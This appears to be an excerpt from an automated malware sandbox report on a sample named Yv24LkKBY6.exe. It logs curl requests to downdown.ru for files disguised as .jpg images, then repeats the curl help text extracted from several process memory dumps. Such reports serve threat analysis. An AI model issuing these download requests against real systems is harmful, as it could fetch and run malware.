    Source: global trafficHTTP traffic detected: GET /wol.jpg HTTP/1.1User-Agent: curl/7.40.0-DEVHost: downdown.ruAccept: */*
    Source: global trafficHTTP traffic detected: GET /dc.jpg HTTP/1.1User-Agent: curl/7.40.0-DEVHost: downdown.ruAccept: */*
    Source: global trafficHTTP traffic detected: GET /bat.jpg HTTP/1.1User-Agent: curl/7.40.0-DEVHost: downdown.ruAccept: */*
    Source: Yv24LkKBY6.exe, 00000000.00000003.20214750806.0000000002840000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Usage: curl [options...] <url>
    Source: Yv24LkKBY6.exe, 00000000.00000003.20214750806.0000000002840000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Usage: curl [options...] <url>Options: (H) means HTTP/HTTPS only, (F) means FTP only --anyauth Pick "any" authentication method (H) --basic Use HTTP Basic Authentication (H) -K, --config FILE Read config from FILE -a, --append Append to target file when uploading (F/SFTP) -C, --continue-at OFFSET Resumed transfer OFFSET --cacert FILE CA certificate to verify peer against (SSL) --capath DIR CA directory to verify peer against (SSL) --crlf Convert LF to CRLF in upload -E, --cert CERT[:PASSWD] Client certificate file and password (SSL) --cert-type TYPE Certificate file type (DER/PEM/ENG) (SSL) --ciphers LIST SSL ciphers to use (SSL) -d, --data DATA HTTP POST data (H) --data-ascii DATA HTTP POST ASCII data (H) --compressed Request compressed response (using deflate or gzip) --data-binary DATA HTTP POST binary data (H) --connect-timeout SECONDS Maximum time allowed for connection -b, --cookie STRING/FILE Read cookies from STRING/FILE (H) --data-urlencode DATA HTTP POST data url encoded (H) -c, --cookie-jar FILE Write cookies to FILE after operation (H) --delegation STRING GSS-API delegation permission --disable-eprt Inhibit using EPRT or LPRT (F) --create-dirs Create necessary local directory hierarchy --crlfile FILE Get a CRL list in PEM format from the given file --digest Use HTTP Digest Authentication (H) --disable-epsv Inhibit using EPSV (F) --dns-servers DNS server addrs to use: 1.1.1.1;2.2.2.2 --dns-interface Interface to use for DNS requests -D, --dump-header FILE Write the headers to FILE --dns-ipv4-addr IPv4 address to use for DNS requests, dot notation --egd-file FILE EGD socket path for random data (SSL) --dns-ipv6-addr IPv6 address to use for DNS requests, dot notation -F, --form CONTENT Specify HTTP multipart POST data (H) --engine ENGINE Crypto engine (use "--engine list" for list) (SSL) --ftp-account DATA Account data string (F) -f, --fail Fail silently (no output at all) on HTTP errors (H) --ftp-pasv Use PASV/EPSV instead of PORT (F) --ftp-ssl-ccc-mode ACTIVE/PASSIVE Set CCC mode (F) --form-string STRING Specify HTTP multipart POST data (H) --ftp-alternative-to-user COMMAND String to replace "USER [name]" (F) -G, --get Send the -d data with a HTTP GET (H) --ftp-create-dirs Create the remote dirs if not present (F) --ftp-ssl-ccc Send CCC after authenticating (F) -H, --header LINE Pass custom header LINE to server (H) --ftp-method [MULTICWD/NOCWD/SINGLECWD] Control CWD usage (F) -h, --help This help text -P, --ftp-port ADR Use PORT with given address instead of PASV (F) --ftp-skip-pasv-ip Skip the IP address for PASV (F)
    Source: curl.exe, 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: Usage: curl [options...] <url>
    Source: curl.exe, 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: Usage: curl [options...] <url>Options: (H) means HTTP/HTTPS only, (F) means FTP only --anyauth Pick "any" authentication method (H) --basic Use HTTP Basic Authentication (H) -K, --config FILE Read config from FILE -a, --append Append to target file when uploading (F/SFTP) -C, --continue-at OFFSET Resumed transfer OFFSET --cacert FILE CA certificate to verify peer against (SSL) --capath DIR CA directory to verify peer against (SSL) --crlf Convert LF to CRLF in upload -E, --cert CERT[:PASSWD] Client certificate file and password (SSL) --cert-type TYPE Certificate file type (DER/PEM/ENG) (SSL) --ciphers LIST SSL ciphers to use (SSL) -d, --data DATA HTTP POST data (H) --data-ascii DATA HTTP POST ASCII data (H) --compressed Request compressed response (using deflate or gzip) --data-binary DATA HTTP POST binary data (H) --connect-timeout SECONDS Maximum time allowed for connection -b, --cookie STRING/FILE Read cookies from STRING/FILE (H) --data-urlencode DATA HTTP POST data url encoded (H) -c, --cookie-jar FILE Write cookies to FILE after operation (H) --delegation STRING GSS-API delegation permission --disable-eprt Inhibit using EPRT or LPRT (F) --create-dirs Create necessary local directory hierarchy --crlfile FILE Get a CRL list in PEM format from the given file --digest Use HTTP Digest Authentication (H) --disable-epsv Inhibit using EPSV (F) --dns-servers DNS server addrs to use: 1.1.1.1;2.2.2.2 --dns-interface Interface to use for DNS requests -D, --dump-header FILE Write the headers to FILE --dns-ipv4-addr IPv4 address to use for DNS requests, dot notation --egd-file FILE EGD socket path for random data (SSL) --dns-ipv6-addr IPv6 address to use for DNS requests, dot notation -F, --form CONTENT Specify HTTP multipart POST data (H) --engine ENGINE Crypto engine (use "--engine list" for list) (SSL) --ftp-account DATA Account data string (F) -f, --fail Fail silently (no output at all) on HTTP errors (H) --ftp-pasv Use PASV/EPSV instead of PORT (F) --ftp-ssl-ccc-mode ACTIVE/PASSIVE Set CCC mode (F) --form-string STRING Specify HTTP multipart POST data (H) --ftp-alternative-to-user COMMAND String to replace "USER [name]" (F) -G, --get Send the -d data with a HTTP GET (H) --ftp-create-dirs Create the remote dirs if not present (F) --ftp-ssl-ccc Send CCC after authenticating (F) -H, --header LINE Pass custom header LINE to server (H) --ftp-method [MULTICWD/NOCWD/SINGLECWD] Control CWD usage (F) -h, --help This help text -P, --ftp-port ADR Use PORT with given address instead of PASV (F) --ftp-skip-pasv-ip Skip the IP address for PASV (F)
    Source: curl.exe, 00000022.00000000.20288780667.0000000000309000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: Usage: curl [options...] <url>
    Source: curl.exe, 00000022.00000000.20288780667.0000000000309000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: Usage: curl [options...] <url>Options: (H) means HTTP/HTTPS only, (F) means FTP only --anyauth Pick "any" authentication method (H) --basic Use HTTP Basic Authentication (H) -K, --config FILE Read config from FILE -a, --append Append to target file when uploading (F/SFTP) -C, --continue-at OFFSET Resumed transfer OFFSET --cacert FILE CA certificate to verify peer against (SSL) --capath DIR CA directory to verify peer against (SSL) --crlf Convert LF to CRLF in upload -E, --cert CERT[:PASSWD] Client certificate file and password (SSL) --cert-type TYPE Certificate file type (DER/PEM/ENG) (SSL) --ciphers LIST SSL ciphers to use (SSL) -d, --data DATA HTTP POST data (H) --data-ascii DATA HTTP POST ASCII data (H) --compressed Request compressed response (using deflate or gzip) --data-binary DATA HTTP POST binary data (H) --connect-timeout SECONDS Maximum time allowed for connection -b, --cookie STRING/FILE Read cookies from STRING/FILE (H) --data-urlencode DATA HTTP POST data url encoded (H) -c, --cookie-jar FILE Write cookies to FILE after operation (H) --delegation STRING GSS-API delegation permission --disable-eprt Inhibit using EPRT or LPRT (F) --create-dirs Create necessary local directory hierarchy --crlfile FILE Get a CRL list in PEM format from the given file --digest Use HTTP Digest Authentication (H) --disable-epsv Inhibit using EPSV (F) --dns-servers DNS server addrs to use: 1.1.1.1;2.2.2.2 --dns-interface Interface to use for DNS requests -D, --dump-header FILE Write the headers to FILE --dns-ipv4-addr IPv4 address to use for DNS requests, dot notation --egd-file FILE EGD socket path for random data (SSL) --dns-ipv6-addr IPv6 address to use for DNS requests, dot notation -F, --form CONTENT Specify HTTP multipart POST data (H) --engine ENGINE Crypto engine (use "--engine list" for list) (SSL) --ftp-account DATA Account data string (F) -f, --fail Fail silently (no output at all) on HTTP errors (H) --ftp-pasv Use PASV/EPSV instead of PORT (F) --ftp-ssl-ccc-mode ACTIVE/PASSIVE Set CCC mode (F) --form-string STRING Specify HTTP multipart POST data (H) --ftp-alternative-to-user COMMAND String to replace "USER [name]" (F) -G, --get Send the -d data with a HTTP GET (H) --ftp-create-dirs Create the remote dirs if not present (F) --ftp-ssl-ccc Send CCC after authenticating (F) -H, --header LINE Pass custom header LINE to server (H) --ftp-method [MULTICWD/NOCWD/SINGLECWD] Control CWD usage (F) -h, --help This help text -P, --ftp-port ADR Use PORT with given address instead of PASV (F) --ftp-skip-pasv-ip Skip the IP address for PASV (F)
    Source: curl.exe, 00000023.00000002.20326390773.000000000030B000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: Usage: curl [options...] <url>
    Source: curl.exe, 00000023.00000002.20326390773.000000000030B000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: Usage: curl [options...] <url>Options: (H) means HTTP/HTTPS only, (F) means FTP only --anyauth Pick "any" authentication method (H) --basic Use HTTP Basic Authentication (H) -K, --config FILE Read config from FILE -a, --append Append to target file when uploading (F/SFTP) -C, --continue-at OFFSET Resumed transfer OFFSET --cacert FILE CA certificate to verify peer against (SSL) --capath DIR CA directory to verify peer against (SSL) --crlf Convert LF to CRLF in upload -E, --cert CERT[:PASSWD] Client certificate file and password (SSL) --cert-type TYPE Certificate file type (DER/PEM/ENG) (SSL) --ciphers LIST SSL ciphers to use (SSL) -d, --data DATA HTTP POST data (H) --data-ascii DATA HTTP POST ASCII data (H) --compressed Request compressed response (using deflate or gzip) --data-binary DATA HTTP POST binary data (H) --connect-timeout SECONDS Maximum time allowed for connection -b, --cookie STRING/FILE Read cookies from STRING/FILE (H) --data-urlencode DATA HTTP POST data url encoded (H) -c, --cookie-jar FILE Write cookies to FILE after operation (H) --delegation STRING GSS-API delegation permission --disable-eprt Inhibit using EPRT or LPRT (F) --create-dirs Create necessary local directory hierarchy --crlfile FILE Get a CRL list in PEM format from the given file --digest Use HTTP Digest Authentication (H) --disable-epsv Inhibit using EPSV (F) --dns-servers DNS server addrs to use: 1.1.1.1;2.2.2.2 --dns-interface Interface to use for DNS requests -D, --dump-header FILE Write the headers to FILE --dns-ipv4-addr IPv4 address to use for DNS requests, dot notation --egd-file FILE EGD socket path for random data (SSL) --dns-ipv6-addr IPv6 address to use for DNS requests, dot notation -F, --form CONTENT Specify HTTP multipart POST data (H) --engine ENGINE Crypto engine (use "--engine list" for list) (SSL) --ftp-account DATA Account data string (F) -f, --fail Fail silently (no output at all) on HTTP errors (H) --ftp-pasv Use PASV/EPSV instead of PORT (F) --ftp-ssl-ccc-mode ACTIVE/PASSIVE Set CCC mode (F) --form-string STRING Specify HTTP multipart POST data (H) --ftp-alternative-to-user COMMAND String to replace "USER [name]" (F) -G, --get Send the -d data with a HTTP GET (H) --ftp-create-dirs Create the remote dirs if not present (F) --ftp-ssl-ccc Send CCC after authenticating (F) -H, --header LINE Pass custom header LINE to server (H) --ftp-method [MULTICWD/NOCWD/SINGLECWD] Control CWD usage (F) -h, --help This help text -P, --ftp-port ADR Use PORT with given address instead of PASV (F) --ftp-skip-pasv-ip Skip the IP address for PASV (F)
    Source: curl.exe, 00000023.00000000.20311354865.0000000000309000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: Usage: curl [options...] <url>
    Source: curl.exe, 00000023.00000000.20311354865.0000000000309000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: Usage: curl [options...] <url>Options: (H) means HTTP/HTTPS only, (F) means FTP only --anyauth Pick "any" authentication method (H) --basic Use HTTP Basic Authentication (H) -K, --config FILE Read config from FILE -a, --append Append to target file when uploading (F/SFTP) -C, --continue-at OFFSET Resumed transfer OFFSET --cacert FILE CA certificate to verify peer against (SSL) --capath DIR CA directory to verify peer against (SSL) --crlf Convert LF to CRLF in upload -E, --cert CERT[:PASSWD] Client certificate file and password (SSL) --cert-type TYPE Certificate file type (DER/PEM/ENG) (SSL) --ciphers LIST SSL ciphers to use (SSL) -d, --data DATA HTTP POST data (H) --data-ascii DATA HTTP POST ASCII data (H) --compressed Request compressed response (using deflate or gzip) --data-binary DATA HTTP POST binary data (H) --connect-timeout SECONDS Maximum time allowed for connection -b, --cookie STRING/FILE Read cookies from STRING/FILE (H) --data-urlencode DATA HTTP POST data url encoded (H) -c, --cookie-jar FILE Write cookies to FILE after operation (H) --delegation STRING GSS-API delegation permission --disable-eprt Inhibit using EPRT or LPRT (F) --create-dirs Create necessary local directory hierarchy --crlfile FILE Get a CRL list in PEM format from the given file --digest Use HTTP Digest Authentication (H) --disable-epsv Inhibit using EPSV (F) --dns-servers DNS server addrs to use: 1.1.1.1;2.2.2.2 --dns-interface Interface to use for DNS requests -D, --dump-header FILE Write the headers to FILE --dns-ipv4-addr IPv4 address to use for DNS requests, dot notation --egd-file FILE EGD socket path for random data (SSL) --dns-ipv6-addr IPv6 address to use for DNS requests, dot notation -F, --form CONTENT Specify HTTP multipart POST data (H) --engine ENGINE Crypto engine (use "--engine list" for list) (SSL) --ftp-account DATA Account data string (F) -f, --fail Fail silently (no output at all) on HTTP errors (H) --ftp-pasv Use PASV/EPSV instead of PORT (F) --ftp-ssl-ccc-mode ACTIVE/PASSIVE Set CCC mode (F) --form-string STRING Specify HTTP multipart POST data (H) --ftp-alternative-to-user COMMAND String to replace "USER [name]" (F) -G, --get Send the -d data with a HTTP GET (H) --ftp-create-dirs Create the remote dirs if not present (F) --ftp-ssl-ccc Send CCC after authenticating (F) -H, --header LINE Pass custom header LINE to server (H) --ftp-method [MULTICWD/NOCWD/SINGLECWD] Control CWD usage (F) -h, --help This help text -P, --ftp-port ADR Use PORT with given address instead of PASV (F) --ftp-skip-pasv-ip Skip the IP address for PASV (F)
    Source: curl.exe, 00000024.00000002.20360586166.000000000030B000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: Usage: curl [options...] <url>
    Source: curl.exe, 00000024.00000002.20360586166.000000000030B000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: Usage: curl [options...] <url>Options: (H) means HTTP/HTTPS only, (F) means FTP only --anyauth Pick "any" authentication method (H) --basic Use HTTP Basic Authentication (H) -K, --config FILE Read config from FILE -a, --append Append to target file when uploading (F/SFTP) -C, --continue-at OFFSET Resumed transfer OFFSET --cacert FILE CA certificate to verify peer against (SSL) --capath DIR CA directory to verify peer against (SSL) --crlf Convert LF to CRLF in upload -E, --cert CERT[:PASSWD] Client certificate file and password (SSL) --cert-type TYPE Certificate file type (DER/PEM/ENG) (SSL) --ciphers LIST SSL ciphers to use (SSL) -d, --data DATA HTTP POST data (H) --data-ascii DATA HTTP POST ASCII data (H) --compressed Request compressed response (using deflate or gzip) --data-binary DATA HTTP POST binary data (H) --connect-timeout SECONDS Maximum time allowed for connection -b, --cookie STRING/FILE Read cookies from STRING/FILE (H) --data-urlencode DATA HTTP POST data url encoded (H) -c, --cookie-jar FILE Write cookies to FILE after operation (H) --delegation STRING GSS-API delegation permission --disable-eprt Inhibit using EPRT or LPRT (F) --create-dirs Create necessary local directory hierarchy --crlfile FILE Get a CRL list in PEM format from the given file --digest Use HTTP Digest Authentication (H) --disable-epsv Inhibit using EPSV (F) --dns-servers DNS server addrs to use: 1.1.1.1;2.2.2.2 --dns-interface Interface to use for DNS requests -D, --dump-header FILE Write the headers to FILE --dns-ipv4-addr IPv4 address to use for DNS requests, dot notation --egd-file FILE EGD socket path for random data (SSL) --dns-ipv6-addr IPv6 address to use for DNS requests, dot notation -F, --form CONTENT Specify HTTP multipart POST data (H) --engine ENGINE Crypto engine (use "--engine list" for list) (SSL) --ftp-account DATA Account data string (F) -f, --fail Fail silently (no output at all) on HTTP errors (H) --ftp-pasv Use PASV/EPSV instead of PORT (F) --ftp-ssl-ccc-mode ACTIVE/PASSIVE Set CCC mode (F) --form-string STRING Specify HTTP multipart POST data (H) --ftp-alternative-to-user COMMAND String to replace "USER [name]" (F) -G, --get Send the -d data with a HTTP GET (H) --ftp-create-dirs Create the remote dirs if not present (F) --ftp-ssl-ccc Send CCC after authenticating (F) -H, --header LINE Pass custom header LINE to server (H) --ftp-method [MULTICWD/NOCWD/SINGLECWD] Control CWD usage (F) -h, --help This help text -P, --ftp-port ADR Use PORT with given address instead of PASV (F) --ftp-skip-pasv-ip Skip the IP address for PASV (F)
    Source: curl.exe, 00000024.00000000.20328637461.0000000000309000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: Usage: curl [options...] <url>
    Source: curl.exe, 00000024.00000000.20328637461.0000000000309000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: Usage: curl [options...] <url>Options: (H) means HTTP/HTTPS only, (F) means FTP only --anyauth Pick "any" authentication method (H) --basic Use HTTP Basic Authentication (H) -K, --config FILE Read config from FILE -a, --append Append to target file when uploading (F/SFTP) -C, --continue-at OFFSET Resumed transfer OFFSET --cacert FILE CA certificate to verify peer against (SSL) --capath DIR CA directory to verify peer against (SSL) --crlf Convert LF to CRLF in upload -E, --cert CERT[:PASSWD] Client certificate file and password (SSL) --cert-type TYPE Certificate file type (DER/PEM/ENG) (SSL) --ciphers LIST SSL ciphers to use (SSL) -d, --data DATA HTTP POST data (H) --data-ascii DATA HTTP POST ASCII data (H) --compressed Request compressed response (using deflate or gzip) --data-binary DATA HTTP POST binary data (H) --connect-timeout SECONDS Maximum time allowed for connection -b, --cookie STRING/FILE Read cookies from STRING/FILE (H) --data-urlencode DATA HTTP POST data url encoded (H) -c, --cookie-jar FILE Write cookies to FILE after operation (H) --delegation STRING GSS-API delegation permission --disable-eprt Inhibit using EPRT or LPRT (F) --create-dirs Create necessary local directory hierarchy --crlfile FILE Get a CRL list in PEM format from the given file --digest Use HTTP Digest Authentication (H) --disable-epsv Inhibit using EPSV (F) --dns-servers DNS server addrs to use: 1.1.1.1;2.2.2.2 --dns-interface Interface to use for DNS requests -D, --dump-header FILE Write the headers to FILE --dns-ipv4-addr IPv4 address to use for DNS requests, dot notation --egd-file FILE EGD socket path for random data (SSL) --dns-ipv6-addr IPv6 address to use for DNS requests, dot notation -F, --form CONTENT Specify HTTP multipart POST data (H) --engine ENGINE Crypto engine (use "--engine list" for list) (SSL) --ftp-account DATA Account data string (F) -f, --fail Fail silently (no output at all) on HTTP errors (H) --ftp-pasv Use PASV/EPSV instead of PORT (F) --ftp-ssl-ccc-mode ACTIVE/PASSIVE Set CCC mode (F) --form-string STRING Specify HTTP multipart POST data (H) --ftp-alternative-to-user COMMAND String to replace "USER [name]" (F) -G, --get Send the -d data with a HTTP GET (H) --ftp-create-dirs Create the remote dirs if not present (F) --ftp-ssl-ccc Send CCC after authenticating (F) -H, --header LINE Pass custom header LINE to server (H) --ftp-method [MULTICWD/NOCWD/SINGLECWD] Control CWD usage (F) -h, --help This help text -P, --ftp-port ADR Use PORT with given address instead of PASV (F) --ftp-skip-pasv-ip Skip the IP address for PASV (F)
    Source: curl.exe, 00000025.00000002.20385900647.000000000030B000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: Usage: curl [options...] <url>
    Source: curl.exe, 00000025.00000002.20385900647.000000000030B000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: Usage: curl [options...] <url>Options: (H) means HTTP/HTTPS only, (F) means FTP only --anyauth Pick "any" authentication method (H) --basic Use HTTP Basic Authentication (H) -K, --config FILE Read config from FILE -a, --append Append to target file when uploading (F/SFTP) -C, --continue-at OFFSET Resumed transfer OFFSET --cacert FILE CA certificate to verify peer against (SSL) --capath DIR CA directory to verify peer against (SSL) --crlf Convert LF to CRLF in upload -E, --cert CERT[:PASSWD] Client certificate file and password (SSL) --cert-type TYPE Certificate file type (DER/PEM/ENG) (SSL) --ciphers LIST SSL ciphers to use (SSL) -d, --data DATA HTTP POST data (H) --data-ascii DATA HTTP POST ASCII data (H) --compressed Request compressed response (using deflate or gzip) --data-binary DATA HTTP POST binary data (H) --connect-timeout SECONDS Maximum time allowed for connection -b, --cookie STRING/FILE Read cookies from STRING/FILE (H) --data-urlencode DATA HTTP POST data url encoded (H) -c, --cookie-jar FILE Write cookies to FILE after operation (H) --delegation STRING GSS-API delegation permission --disable-eprt Inhibit using EPRT or LPRT (F) --create-dirs Create necessary local directory hierarchy --crlfile FILE Get a CRL list in PEM format from the given file --digest Use HTTP Digest Authentication (H) --disable-epsv Inhibit using EPSV (F) --dns-servers DNS server addrs to use: 1.1.1.1;2.2.2.2 --dns-interface Interface to use for DNS requests -D, --dump-header FILE Write the headers to FILE --dns-ipv4-addr IPv4 address to use for DNS requests, dot notation --egd-file FILE EGD socket path for random data (SSL) --dns-ipv6-addr IPv6 address to use for DNS requests, dot notation -F, --form CONTENT Specify HTTP multipart POST data (H) --engine ENGINE Crypto engine (use "--engine list" for list) (SSL) --ftp-account DATA Account data string (F) -f, --fail Fail silently (no output at all) on HTTP errors (H) --ftp-pasv Use PASV/EPSV instead of PORT (F) --ftp-ssl-ccc-mode ACTIVE/PASSIVE Set CCC mode (F) --form-string STRING Specify HTTP multipart POST data (H) --ftp-alternative-to-user COMMAND String to replace "USER [name]" (F) -G, --get Send the -d data with a HTTP GET (H) --ftp-create-dirs Create the remote dirs if not present (F) --ftp-ssl-ccc Send CCC after authenticating (F) -H, --header LINE Pass custom header LINE to server (H) --ftp-method [MULTICWD/NOCWD/SINGLECWD] Control CWD usage (F) -h, --help This help text -P, --ftp-port ADR Use PORT with given address instead of PASV (F) --ftp-skip-pasv-ip Skip the IP address for PASV (F)
    Source: curl.exe, 00000025.00000000.20362922109.0000000000309000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: Usage: curl [options...] <url>
    Source: curl.exe, 00000025.00000000.20362922109.0000000000309000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: Usage: curl [options...] <url>Options: (H) means HTTP/HTTPS only, (F) means FTP only --anyauth Pick "any" authentication method (H) --basic Use HTTP Basic Authentication (H) -K, --config FILE Read config from FILE -a, --append Append to target file when uploading (F/SFTP) -C, --continue-at OFFSET Resumed transfer OFFSET --cacert FILE CA certificate to verify peer against (SSL) --capath DIR CA directory to verify peer against (SSL) --crlf Convert LF to CRLF in upload -E, --cert CERT[:PASSWD] Client certificate file and password (SSL) --cert-type TYPE Certificate file type (DER/PEM/ENG) (SSL) --ciphers LIST SSL ciphers to use (SSL) -d, --data DATA HTTP POST data (H) --data-ascii DATA HTTP POST ASCII data (H) --compressed Request compressed response (using deflate or gzip) --data-binary DATA HTTP POST binary data (H) --connect-timeout SECONDS Maximum time allowed for connection -b, --cookie STRING/FILE Read cookies from STRING/FILE (H) --data-urlencode DATA HTTP POST data url encoded (H) -c, --cookie-jar FILE Write cookies to FILE after operation (H) --delegation STRING GSS-API delegation permission --disable-eprt Inhibit using EPRT or LPRT (F) --create-dirs Create necessary local directory hierarchy --crlfile FILE Get a CRL list in PEM format from the given file --digest Use HTTP Digest Authentication (H) --disable-epsv Inhibit using EPSV (F) --dns-servers DNS server addrs to use: 1.1.1.1;2.2.2.2 --dns-interface Interface to use for DNS requests -D, --dump-header FILE Write the headers to FILE --dns-ipv4-addr IPv4 address to use for DNS requests, dot notation --egd-file FILE EGD socket path for random data (SSL) --dns-ipv6-addr IPv6 address to use for DNS requests, dot notation -F, --form CONTENT Specify HTTP multipart POST data (H) --engine ENGINE Crypto engine (use "--engine list" for list) (SSL) --ftp-account DATA Account data string (F) -f, --fail Fail silently (no output at all) on HTTP errors (H) --ftp-pasv Use PASV/EPSV instead of PORT (F) --ftp-ssl-ccc-mode ACTIVE/PASSIVE Set CCC mode (F) --form-string STRING Specify HTTP multipart POST data (H) --ftp-alternative-to-user COMMAND String to replace "USER [name]" (F) -G, --get Send the -d data with a HTTP GET (H) --ftp-create-dirs Create the remote dirs if not present (F) --ftp-ssl-ccc Send CCC after authenticating (F) -H, --header LINE Pass custom header LINE to server (H) --ftp-method [MULTICWD/NOCWD/SINGLECWD] Control CWD usage (F) -h, --help This help text -P, --ftp-port ADR Use PORT with given address instead of PASV (F) --ftp-skip-pasv-ip Skip the IP address for PASV (F)
    Source: curl.exe, 00000026.00000002.20394300207.000000000030B000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: Usage: curl [options...] <url>
    Source: curl.exe, 00000026.00000002.20394300207.000000000030B000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: Usage: curl [options...] <url>Options: (H) means HTTP/HTTPS only, (F) means FTP only --anyauth Pick "any" authentication method (H) --basic Use HTTP Basic Authentication (H) -K, --config FILE Read config from FILE -a, --append Append to target file when uploading (F/SFTP) -C, --continue-at OFFSET Resumed transfer OFFSET --cacert FILE CA certificate to verify peer against (SSL) --capath DIR CA directory to verify peer against (SSL) --crlf Convert LF to CRLF in upload -E, --cert CERT[:PASSWD] Client certificate file and password (SSL) --cert-type TYPE Certificate file type (DER/PEM/ENG) (SSL) --ciphers LIST SSL ciphers to use (SSL) -d, --data DATA HTTP POST data (H) --data-ascii DATA HTTP POST ASCII data (H) --compressed Request compressed response (using deflate or gzip) --data-binary DATA HTTP POST binary data (H) --connect-timeout SECONDS Maximum time allowed for connection -b, --cookie STRING/FILE Read cookies from STRING/FILE (H) --data-urlencode DATA HTTP POST data url encoded (H) -c, --cookie-jar FILE Write cookies to FILE after operation (H) --delegation STRING GSS-API delegation permission --disable-eprt Inhibit using EPRT or LPRT (F) --create-dirs Create necessary local directory hierarchy --crlfile FILE Get a CRL list in PEM format from the given file --digest Use HTTP Digest Authentication (H) --disable-epsv Inhibit using EPSV (F) --dns-servers DNS server addrs to use: 1.1.1.1;2.2.2.2 --dns-interface Interface to use for DNS requests -D, --dump-header FILE Write the headers to FILE --dns-ipv4-addr IPv4 address to use for DNS requests, dot notation --egd-file FILE EGD socket path for random data (SSL) --dns-ipv6-addr IPv6 address to use for DNS requests, dot notation -F, --form CONTENT Specify HTTP multipart POST data (H) --engine ENGINE Crypto engine (use "--engine list" for list) (SSL) --ftp-account DATA Account data string (F) -f, --fail Fail silently (no output at all) on HTTP errors (H) --ftp-pasv Use PASV/EPSV instead of PORT (F) --ftp-ssl-ccc-mode ACTIVE/PASSIVE Set CCC mode (F) --form-string STRING Specify HTTP multipart POST data (H) --ftp-alternative-to-user COMMAND String to replace "USER [name]" (F) -G, --get Send the -d data with a HTTP GET (H) --ftp-create-dirs Create the remote dirs if not present (F) --ftp-ssl-ccc Send CCC after authenticating (F) -H, --header LINE Pass custom header LINE to server (H) --ftp-method [MULTICWD/NOCWD/SINGLECWD] Control CWD usage (F) -h, --help This help text -P, --ftp-port ADR Use PORT with given address instead of PASV (F) --ftp-skip-pasv-ip Skip the IP address for PASV (F)
    Source: curl.exe, 00000026.00000000.20388092061.0000000000309000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: Usage: curl [options...] <url>
    Source: curl.exe, 00000026.00000000.20388092061.0000000000309000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: Usage: curl [options...] <url>Options: (H) means HTTP/HTTPS only, (F) means FTP only --anyauth Pick "any" authentication method (H) --basic Use HTTP Basic Authentication (H) -K, --config FILE Read config from FILE -a, --append Append to target file when uploading (F/SFTP) -C, --continue-at OFFSET Resumed transfer OFFSET --cacert FILE CA certificate to verify peer against (SSL) --capath DIR CA directory to verify peer against (SSL) --crlf Convert LF to CRLF in upload -E, --cert CERT[:PASSWD] Client certificate file and password (SSL) --cert-type TYPE Certificate file type (DER/PEM/ENG) (SSL) --ciphers LIST SSL ciphers to use (SSL) -d, --data DATA HTTP POST data (H) --data-ascii DATA HTTP POST ASCII data (H) --compressed Request compressed response (using deflate or gzip) --data-binary DATA HTTP POST binary data (H) --connect-timeout SECONDS Maximum time allowed for connection -b, --cookie STRING/FILE Read cookies from STRING/FILE (H) --data-urlencode DATA HTTP POST data url encoded (H) -c, --cookie-jar FILE Write cookies to FILE after operation (H) --delegation STRING GSS-API delegation permission --disable-eprt Inhibit using EPRT or LPRT (F) --create-dirs Create necessary local directory hierarchy --crlfile FILE Get a CRL list in PEM format from the given file --digest Use HTTP Digest Authentication (H) --disable-epsv Inhibit using EPSV (F) --dns-servers DNS server addrs to use: 1.1.1.1;2.2.2.2 --dns-interface Interface to use for DNS requests -D, --dump-header FILE Write the headers to FILE --dns-ipv4-addr IPv4 address to use for DNS requests, dot notation --egd-file FILE EGD socket path for random data (SSL) --dns-ipv6-addr IPv6 address to use for DNS requests, dot notation -F, --form CONTENT Specify HTTP multipart POST data (H) --engine ENGINE Crypto engine (use "--engine list" for list) (SSL) --ftp-account DATA Account data string (F) -f, --fail Fail silently (no output at all) on HTTP errors (H) --ftp-pasv Use PASV/EPSV instead of PORT (F) --ftp-ssl-ccc-mode ACTIVE/PASSIVE Set CCC mode (F) --form-string STRING Specify HTTP multipart POST data (H) --ftp-alternative-to-user COMMAND String to replace "USER [name]" (F) -G, --get Send the -d data with a HTTP GET (H) --ftp-create-dirs Create the remote dirs if not present (F) --ftp-ssl-ccc Send CCC after authenticating (F) -H, --header LINE Pass custom header LINE to server (H) --ftp-method [MULTICWD/NOCWD/SINGLECWD] Control CWD usage (F) -h, --help This help text -P, --ftp-port ADR Use PORT with given address instead of PASV (F) --ftp-skip-pasv-ip Skip the IP address for PASV (F)
    Source: curl.exe, 00000027.00000000.20396877976.0000000000309000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: Usage: curl [options...] <url>
    Source: curl.exe, 00000027.00000000.20396877976.0000000000309000.00000008.00000001.01000000.00000006.sdmpString found in binary or memory: Usage: curl [options...] <url>Options: (H) means HTTP/HTTPS only, (F) means FTP only --anyauth Pick "any" authentication method (H) --basic Use HTTP Basic Authentication (H) -K, --config FILE Read config from FILE -a, --append Append to target file when uploading (F/SFTP) -C, --continue-at OFFSET Resumed transfer OFFSET --cacert FILE CA certificate to verify peer against (SSL) --capath DIR CA directory to verify peer against (SSL) --crlf Convert LF to CRLF in upload -E, --cert CERT[:PASSWD] Client certificate file and password (SSL) --cert-type TYPE Certificate file type (DER/PEM/ENG) (SSL) --ciphers LIST SSL ciphers to use (SSL) -d, --data DATA HTTP POST data (H) --data-ascii DATA HTTP POST ASCII data (H) --compressed Request compressed response (using deflate or gzip) --data-binary DATA HTTP POST binary data (H) --connect-timeout SECONDS Maximum time allowed for connection -b, --cookie 